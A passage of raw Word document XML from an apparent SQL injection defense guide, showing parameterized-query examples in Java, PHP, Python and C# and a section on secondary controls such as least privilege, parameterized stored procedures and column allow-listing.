          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java (JDBC PreparedStatement):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-78"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java</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String query = </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"SELECT id, name, price FROM products WHERE category = ? AND released = 1"</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try</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PreparedStatement pstmt = connection.prepareStatement(query))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pstmt.setString(</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, userInputCategory);</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keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ResultSet rs = pstmt.executeQuery())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keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (rs.next())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comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>// Process result set securely</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP (PDO Prepared Statements):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$stmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$pdo</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-&gt;prepare(</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'SELECT id, name, price FROM products WHERE category = :category AND released = 1'</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ljs-variable"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$stmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-&gt;execute([</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'category'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$userInputCategory</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ljs-variable"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$products</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-variable"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$stmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-&gt;fetchAll();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Python (Psycopg2 / PostgreSQL Parameterization):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Python</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lastRenderedPageBreak/>
        <w:t>cursor.execute(</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string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"SELECT id, name, price FROM products WHERE category = %s AND released = 1;"</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(user_input_category,)</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records = cursor.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C# (.NET SqlCommand with Parameters):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-81"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-builtin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> query = </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"SELECT id, name, price FROM products WHERE category = @category AND released = 1"</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ljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SqlCommand cmd = </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SqlCommand(query, connection))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cmd.Parameters.Add(</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"@category"</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, SqlDbType.VarChar, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).Value = userInputCategory;</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keyword"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SqlDataReader reader = cmd.ExecuteReader())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r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>// Process records securely</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    }</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w:t>
      </w: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817D5D" w:rsidRPr="007F73B1" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.2 Secondary Defensive Controls (Defense-in-Depth)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>While Parameterized Queries address the root vulnerability, a robust security architecture incorporates secondary defensive controls:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Principle of Least Privilege (PoLP):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configure the database user account used by the web application with only the minimal permissions required for its function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict application accounts from querying system tables (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Oracle's </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all_tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Separate accounts by operational role: an application reporting service should only have read access (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) to specific tables, with no write (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) or administrative (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ALTER</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored Procedures with Parameterization:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored procedures should use parameterized variables rather than dynamic query building (such as calling </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EXEC()</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EXECUTE IMMEDIATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with concatenated strings), which can reintroduce SQL injection flaws inside the database engine itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strict Input Allow-Listing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dynamic structural elements—such as table names, column names, and sorting directions (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ASC</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DESC</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)—cannot be parameterized using standard prepared statement placeholders. When these elements depend on user input, validate them against an explicit server-side allow-list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="ng-tns-c507410133-82"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>// Allow-list validation for dynamic sorting columns</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List&lt;String&gt; allowedColumns = Arrays.asList(</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"price"</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"rating"</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"date_added"</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lastRenderedPageBreak/>
